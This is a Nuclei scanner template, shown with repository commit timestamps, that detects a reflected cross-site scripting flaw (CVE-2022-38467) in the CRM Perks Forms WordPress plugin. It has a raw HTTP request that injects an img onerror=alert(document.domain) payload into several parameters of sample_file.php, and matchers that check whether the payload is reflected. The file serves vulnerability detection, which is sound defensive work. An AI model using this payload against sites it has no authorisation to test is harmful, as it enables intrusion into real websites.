nuclei-templates/http/cves/2022/CVE-2022-38467.yaml

49 lines
2.2 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-38467
info:
name: CRM Perks Forms < 1.1.1 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 1.1.1
2023-04-21 08:56:01 +00:00
reference:
- https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53
- https://wordpress.org/plugins/crm-perks-forms/
- https://nvd.nist.gov/vuln/detail/CVE-2022-38467
2023-07-11 19:49:27 +00:00
- https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-04-21 08:56:01 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-04-21 08:56:01 +00:00
cve-id: CVE-2022-38467
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00074
epss-percentile: 0.30453
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: crmperks
product: crm_perks_forms
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_1, "CRM Perks Forms") && contains(body_2, "<img src onerror=alert(document.domain)>")'
condition: and
# digest: 4b0a00483046022100eeaaa40af379d77811cc1343094e6b8412719b312bd1cb7561ba293380ed5841022100821277d2e851584fdff4d956aaf6c6cd6f8c9f7094c146c1050f78580eb0b34e:922c64590222798bb761d5b6d8e72950